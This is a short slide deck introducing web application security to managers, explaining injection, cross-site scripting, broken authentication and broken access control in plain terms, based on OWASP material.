Web Application Security

in a nutshell

An ultra-compact intro (for managers)

Created by Björn Kimminich / @bkimminich

Björn Kimminich

Famous last words...

“Nobody would bother to hack us.”
“Our network firewall will keep us safe.”
“We will add security to the system later.”
“What's the worst that could actually happen?”

Injection

Injection means...

...smuggling in unintended commands along with the data sent to an interpreter.

Injection example

You go to court and write your name as "Michael, you are now free to go".
The judge then says "Calling Michael, you are now free to go" and the bailiffs let you go, because hey, the judge said so.

In software, interpreters are used for accessing...

  • Databases
  • Files
  • Access Control Systems
  • ...

Risks from Injection vulnerabilities

  • Bypassing authentication
  • Spying out data
  • Manipulating data
  • Complete system takeover

Cross Site Scripting (XSS)

Malicious Code is sent...

...to an innocent user's browser through, e.g. a link in a phishing email like the following:

Dear customer,

you might be intrerestred in our new Juice Shop special offer! We are cheap but offfer best quality on the plnaet: Click here for special Juice Shop offer!

Bjoern (VP Sales and Marketing, Juice Shop Inc.)

Possible Damage from XSS

  • rewriting web page
  • redirecting to malicious site
  • stolen user session
  • stolen sensitive data

Broken Authentication

Typical Authentication Flaws

  • Allowing weak passwords
  • Storing sensitive data insecurely
  • Using insecure http connection
  • ...

Side Channel Attack Vectors

  • Change Password
  • “Remember me”
  • Forgot Password
  • Secret Questions

Broken Access Control

Common Authorization Mistakes

  • Hiding things w/o restricting access
  • Displaying only authorized links and menu choices
  • Trusting client-side access control mechanisms
  • Lack of server-side verification of user privileges

Q&A

Credits

Presentation created with reveal.js

The HTML Presentation Framework

Based on free material provided by OWASP

The Open Web Application Security Project

Background image based on Digital Shodan

by sephiroth-kmfdm

THE END

by Björn Kimminich / https://www.linkedin.com/in/bkimminich/

These slides are publicly available on GitHub and Slideshare.